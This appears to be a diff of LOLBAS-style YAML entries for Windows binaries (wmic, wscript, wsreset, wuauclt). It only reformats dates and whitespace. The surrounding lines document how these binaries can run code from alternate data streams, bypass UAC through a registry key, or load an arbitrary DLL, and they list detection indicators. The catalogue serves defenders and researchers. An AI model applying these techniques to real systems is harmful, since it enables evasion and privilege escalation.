@ -25,4 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@Hexacorn'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Wmic.exe
|
||||
Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: wmic.exe process call create "c:\ads\file.txt:program.exe"
|
||||
Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
|
||||
@ -71,7 +71,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wbem\wmic.exe
|
||||
- Path: C:\Windows\SysWOW64\wbem\wmic.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Wmic getting scripts from remote system
|
||||
@ -82,4 +82,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Wscript.exe
|
||||
Description: Used by Windows to execute scripts
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: wscript c:\ads\file.txt:script.vbs
|
||||
Description: Execute script stored in an alternate data stream
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wscript.exe
|
||||
- Path: C:\Windows\SysWOW64\wscript.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Wscript.exe executing code from alternate data streams
|
||||
@ -34,4 +34,4 @@ Acknowledgement:
|
||||
Handle: '@oddvarmoe'
|
||||
- Person: SaiLay(valen)
|
||||
Handle: '@404death'
|
||||
---
|
||||
---
|
||||
|
@ -2,11 +2,11 @@
|
||||
Name: Wsreset.exe
|
||||
Description: Used to reset Windows Store settings according to its manifest file
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2019-03-18'
|
||||
Created: 2019-03-18
|
||||
Commands:
|
||||
- Command: wsreset.exe
|
||||
Description: During startup, wsreset.exe checks the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
||||
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
||||
Description: During startup, wsreset.exe checks the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command for the command to run. Binary will be executed as a high-integrity process without a UAC prompt being displayed to the user.
|
||||
Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
|
||||
Category: UAC bypass
|
||||
Privileges: User
|
||||
MitreID: T1088
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wsreset.exe
|
||||
Code Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: wsreset.exe launching child process other than mmc.exe
|
||||
- IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: wuauclt.exe
|
||||
Description: Windows Update Client
|
||||
Author: 'David Middlehurst'
|
||||
Created: '2020-09-23'
|
||||
Created: 2020-09-23
|
||||
Commands:
|
||||
- Command: wuauclt.exe /UpdateDeploymentProvider <Full_Path_To_DLL> /RunHandlerComServer
|
||||
Description: Full_Path_To_DLL would be the abosolute path to .DLL file and would execute code on attach.
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\wuauclt.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: wuauclt run with a parameter of a DLL path
|
||||
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue
Block a user